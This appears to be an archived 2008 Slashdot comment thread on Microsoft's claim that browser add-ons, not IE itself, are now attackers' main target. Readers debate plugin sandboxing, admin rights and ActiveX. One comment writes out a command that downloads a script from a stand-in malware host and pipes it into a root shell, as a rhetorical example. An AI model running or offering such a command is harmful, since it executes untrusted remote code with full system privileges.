Microsoft Blames Add-Ons For Browser Woes

← Back to Stories (view on slashdot.org)

Microsoft Blames Add-Ons For Browser Woes

Posted by timothy on Friday November 21, 2008 @08:58AM from the sounds-semi-reasonable dept.

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"

44 of 307 comments (clear)

Min score:

Reason:

Sort:

Duh by Drinking+Bleach · 2008-11-21 09:01 · Score: 5, Insightful

Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?
!news
I'll still blame you for everything else. by retech · 2008-11-21 09:01 · Score: 5, Insightful

Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've miss some.
1. Re:I'll still blame you for everything else. by stewbacca · 2008-11-21 09:09 · Score: 5, Informative
  
  You forgot the "embedded video frequently doesn't play even though it's a Microsoft codec" bit.
2. Re:I'll still blame you for everything else. by gmack · 2008-11-21 09:47 · Score: 5, Funny
  
  That would be an add-on problem.
3. Re:I'll still blame you for everything else. by Anders · 2008-11-21 10:47 · Score: 5, Funny
  
  (Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)
  Much more needed is "-1, Reverse psychology"
  (runner-up is "+1, your uid is prime")
4. Re:I'll still blame you for everything else. by nine-times · 2008-11-21 12:17 · Score: 4, Informative
  
  IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out.
  Complaining that Firefox didn't pass Acid2 until v3 doesn't make a lot of sense if you understand why the test was made. No browsers adhere to all standards 100%, but all the browsers except IE do a fairly decent job of rendering pages the way they're supposed to. So when Acid2 was created, the idea (AFAIK) was to put together a complex rendering that would expose a selection of bugs that would cause every major browser to fail it. It was supposed to be a sort of test that said, "even if your browser is doing a pretty good job, here are some places where it might fall apart."
  So it's not supposed to be the end-all be-all test of standards compliance. You can pass the Acid2 test but still not render normal pages properly, or you could generally do a good job rendering pages but fail the test. The fact that it took Firefox some time to pass isn't an indication that it took them a long time to figure it out, but rather that they fixed in in their new rendering engine and took a while to put that rendering engine into their release version of the browser. There wasn't much reason to rush because it wasn't terribly urgent.
  But the question is still whether the browser will generally render pages according to the HTML and CSS standards. Most browsers do far better than IE. As for "standard-compliant mode", I still wonder how standard-compliant it will be. Right now, if I make a page, I generally have to design it to the standards, which will make it run in most browsers, and then figure out how to make it display properly in IE. If IE8 makes it so I don't have to do that anymore, a lot of my complaints will go away.
5. Re:I'll still blame you for everything else. by BenoitRen · 2008-11-21 12:48 · Score: 3, Informative
  
  definately
  
  Definitely. Definitely!
  
  IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3.
  
  The Acid tests are not an indicator of standards compliance. They're tests of flaws in web browsers that web developers want fixed. KHTML may have passed Acid2 first, but it had a lot of rendering flaws. When Gecko didn't pass Acid2, it had less flaws and was more standards compliant overall.
  
  Bloated? How? I really don't see any bloat compared to other browsers.
  
  Have you checked the size of the installer files? Way larger than that of any other web browser.
6. Re:I'll still blame you for everything else. by TrebleMaker · 2008-11-21 21:57 · Score: 4, Funny
  
  definately
  Definitely. Definitely!
  
  People are going to write they way the write
  irregardless of your protests.
  You should of just, like, totally ignored him.
  
  --
  In Soviet Russia a beowulf cluster of these things imagines you welcoming your new, neural-network overlords.
Permissions by gurps_npc · 2008-11-21 09:02 · Score: 5, Insightful

And if the Add on's were given far more permission than they actually need? If the browser works right, then the damage a poorly written add on can do should be minimal.

--
excitingthingstodo.blogspot.com
1. Re:Permissions by TheRaven64 · 2008-11-21 09:07 · Score: 4, Interesting
  
  Ideally, most of these plugins should be setuid as nobody, run in a separate process and have their windows reparented into the browser window. I don't know of any *NIX systems that actually do this for plugins. I believe Chrome does something similar on Windows, but IE does not (although it runs the entire browser as a less-privileged process on Vista).
  
  --
  I am TheRaven on Soylent News
2. Re:Permissions by geirnord · 2008-11-21 09:07 · Score: 5, Insightful
  
  I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?
3. Re:Permissions by Anonymous Coward · 2008-11-21 09:21 · Score: 5, Informative
  
  Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself.
4. Re:Permissions by ya+really · 2008-11-21 09:29 · Score: 4, Interesting
  
  IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?
5. Re:Permissions by gurps_npc · 2008-11-21 09:48 · Score: 4, Interesting
  
  Because they made it easy to write shoddy code. If you make people go through hoops to get the good stuff, then they get lazy and accept the minimum. To use a real world analogy, no, you don't need to have the same key start the car as open your front door, your mail box, and your office. If you insist on selling a car, house lock, mailbox and the office, then don't also make them use the same key for 'convience'.
  
  --
  excitingthingstodo.blogspot.com
6. Re:Permissions by catchblue22 · 2008-11-21 10:06 · Score: 4, Interesting
  
  IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?
  Should it even be possible for add-ons to do this? Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since vista bugs users for permission so much, most users would just click through the warning thoughtlessly.
  I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious.
  
  --
  This and no other is the root from which a tyrant springs; when first he appears as a protector - Plato (423 to 327 BC)
7. Re:Permissions by MadnessASAP · 2008-11-21 10:41 · Score: 4, Insightful
  
  Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use windows outside of very carefully controlled office and school enviroments without Administrator access is impossible.
  
  --
  I may agree with what you say, but I will defend to the death your right to face the consequences of saying it.
8. Re:Permissions by legirons · 2008-11-21 10:43 · Score: 3, Insightful
  
  IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.
  Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)
  Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)
9. Re:Permissions by Lucky75 · 2008-11-21 10:52 · Score: 4, Interesting
  
  Renaming a file (extension) under program files, for example, prompts you 3x if your sure. I think we could do without the multitude of prompts.
  
  Are you sure?
  Are you really sure?
  Positive?
  Ok
  
  --
  DNA -- National Dyslexic Association
10. Re:Permissions by CodeBuster · 2008-11-21 11:13 · Score: 4, Interesting
  
  can they really be blamed for shoddy coding done by third parties?
  Yes they can and here is why:
  If a program is going to allow addons then the communications between the addons and the main application should be conducted entirely through interfaces in order to preserve abstraction and enforce Design by Contract principles. In this way addons are allowed to plug into the application at precise locations controlled by the main application and to interact with the main application abstractly and in precisely defined and limited ways. Some people might argue that this is too limiting, but it has been my experience in developing software in this style that well designed interface contracts can support a wealth of valuable features while maintaining plug-ability and abstraction throughout the software stack. So I don't buy "It's the addons fault" since the addons, ultimately, can only do things which the main application framework has allowed them to do whether intentionally, through good abstraction, or unintentionally from poor addon framework design.
11. Re:Permissions by DarkOx · 2008-11-21 12:11 · Score: 3, Informative
  
  right because your typical business users would never say want to change the extention of some think like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like the never happens....
  
  --
  Repeal the 17th Amendment TODAY! Also Please Read http://www.gnu.org/philosophy/right-to-read.html
12. Re:Permissions by BradleyUffner · 2008-11-21 13:05 · Score: 3, Informative
  
  right because your typical business users would never say want to change the extention of some think like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like the never happens....
  I typical business user isn't ging to be storing "report.txt" in a protected system path. They are going to save it in My Documents or a subfolder, the default location presented by Vista.
13. Re:Permissions by SanityInAnarchy · 2008-11-21 19:54 · Score: 4, Insightful
  
  Just in case anyone was going to interpret this literally:
  
  Ideally, most of these plugins should be setuid as nobody
  No, no, a thousand times no!
  I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.
  These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.
  The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.
  In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.
  But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!
  
  --
  Don't thank God, thank a doctor!
I've always said this. by bigstrat2003 · 2008-11-21 09:02 · Score: 4, Insightful

The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.
This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

--
"16MB (fuck off, MiB fascists)" - The Mighty Buzzard
1. Re:I've always said this. by Anonymous Coward · 2008-11-21 09:07 · Score: 3, Informative
  
  And if your browser isn't full of security holes, it doesn't matter which sites you go to.
  
  I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses.
2. Re:I've always said this. by Sloppy · 2008-11-21 09:37 · Score: 5, Insightful
  
  The biggest part of internet security is paying attention to where you go.
  I would agree with you, if "going" to a malware site meant
  curl ftp://malwaresite.com/malware.sh | sudo bash
  Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.
  "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."
  
  --
  As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
3. Re:I've always said this. by bigstrat2003 · 2008-11-21 09:41 · Score: 4, Informative
  
  This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy.
  Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners.
  Of course you should use condoms, that's just prudence. But the first line of defense is knowing who you're having sex with.
  And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training.
  
  --
  "16MB (fuck off, MiB fascists)" - The Mighty Buzzard
But remember by dedazo · 2008-11-21 09:03 · Score: 5, Insightful

If it's Firefox, it's perfectly OK to blame the add-ons.
Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.
And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

--
Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
Bullshit. Plain utter bullshit. by syousef · 2008-11-21 09:09 · Score: 4, Insightful

Many non-power-users don't use addons at all.
If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

--
These posts express my own personal views, not those of my employer
1. Re:Bullshit. Plain utter bullshit. by EvanED · 2008-11-21 09:12 · Score: 4, Insightful
  
  Many non-power-users don't use addons at all.
  And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.
2. Re:Bullshit. Plain utter bullshit. by athakur999 · 2008-11-21 09:14 · Score: 4, Insightful
  
  Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.
  If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.
  
  --
  "People that quote themselves in their signatures bother me" - athakur999
I think they have a point.. by Anonymous Coward · 2008-11-21 09:13 · Score: 4, Funny

With the likes of ActiveX, and Silverlight out there, who could blame IE?
1. Re:I think they have a point.. by Ethanol-fueled · 2008-11-21 09:23 · Score: 3, Insightful
  
  Finally!
  
  28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.
  
  Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!
2. Re:I think they have a point.. by greg_barton · 2008-11-21 10:31 · Score: 4, Insightful
  
  Users are always the biggest security threat. It's the OS's job to protect them. OSX and Linux seem to haev no problem doing this, so why can't Windows?
Speaking of add-ons by Anonymous Coward · 2008-11-21 09:17 · Score: 5, Insightful

Would an example of this include the Active X Control you have to install to be able to run Windows Update?
Plugin model by Enderandrew · 2008-11-21 09:25 · Score: 4, Insightful

Aren't the responsible for the plugin model in their browser? Aren't they responsible for the OS security?
Take a look at how Chrome handles plugins and then try to pass the buck.

--
http://blindscribblings.com - Tasty pop-culture in conceptual fashion.
1. Re:Plugin model by benjymouse · 2008-11-21 10:15 · Score: 3, Informative
  
  Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity. IE protected mode is run in "low integrity" - where Vista on intrinsic level protects against modifications to the file system, registry, network access etc.
  Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities.
  If a plugin needs more advanced access than what is provided by his broker process then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability)which enabled a security researcher to execute a program on the Vista in the pwn2own contest.
  Presumably Adobe will use the same approach on other browsers with a similar model such as Chrome. That is why the security researcher was adament that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OS'es which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rouge process taking over the machine, but it does provide more robustness and protect the individual tabs against other tabs going rogue because of browser bugs.
  
  --
  Reading slashdot one-liner: (irm http://rss.slashdot.org/Slashdot/slashdot).rdf.item | fl title,desc*
Largely yes and largely ignorance (mitigation) by betelgeuse68 · 2008-11-21 09:55 · Score: 4, Interesting

Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude with IE's woes miss or fail to understand (yeah including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as as "root"!!! ("administrator" in the Windows vernacular)
I wrote a utility called RemoveAdmin available on Download.com that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights:
http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=mncol&cdlPid=10835515
The installer will create shortcuts for IE and Fifrefox but if you look carefully it's really a program with the browser .EXE passed as an argument.
Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this.
This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights.
(Some caveats)
This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials).
If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link. Likewise this is what you would do before going to WindowsUpate.
And finally, to convince yourself the utility does something useful. Go to any site, "View Source" after you run your browser with the secure link and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't.... since your browser process doesn't have administrative rights (root) and thus any process it launches doesn't either (think of this as a plug-in scenario).
Maybe I'll educate some % of the IT world yet...
Respectfully,
-M
This is too fun by Anonymous Coward · 2008-11-21 09:57 · Score: 5, Funny

I like the sex analogies; I think this should be a new standard for /.
Yours has some good points but:
Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task.
Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way?
1. Re:This is too fun by Bargeld · 2008-11-21 12:12 · Score: 3, Funny
  
  >>I like the sex analogies; I think this should be a new standard for /.
  Nonstarter. Reader-base is unfamiliar with the interface.
  Back to car analogies please.
  --Bargeld
  
  --
  "I hate to advocate drugs, alcohol, violence, or insanity to anyone. But they've always worked for me." --Dr. Hunter S.
What about kde-gnash? by mangu · 2008-11-21 09:59 · Score: 4, Informative

There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was.
You are right that konqueror does not crash the whole computer, but that's still very far from the desired result.
He's right you know ... by Luscious868 · 2008-11-21 10:27 · Score: 3, Funny

'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said.
And if you believe that I've got this great piece of land I'd like to sell you.
It's still your damn fault by BlueParrot · 2008-11-21 10:28 · Score: 4, Insightful

Now lets see... why is it that we need addons for something a simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end.
ActiveXploit by VGPowerlord · 2008-11-21 11:03 · Score: 3, Funny

Wait, did Microsoft just admit that ActiveX is one of the largest security holes ever?

--
GLaDOS for President 2016! "Well here we are again. It's always such a pleasure." -- GLaDOS, 2011
Listen to his comments for the full story by Jeff+Moss · 2008-11-21 12:36 · Score: 3, Interesting

Quick note: This article is a spin off of what Eric had to say during the most recent Black Hat Webcast, where Jeremiah Grossman was talking about clickjacking and other related browser issues. Eric made a lot of sense talking about plug ins and addons being the cross platform low hanging fruit.
Listen and watch the webinar to hear what he had to say and keep everything in context:
http://w.on24.com/r.htm?e=122494&s=1&k=05ED21C1734D531D2D84CA56F4ADB0F2
Or download the .m4b audio file when we get it online next week here:
https://www.blackhat.com/html/webinars/webinars-index.html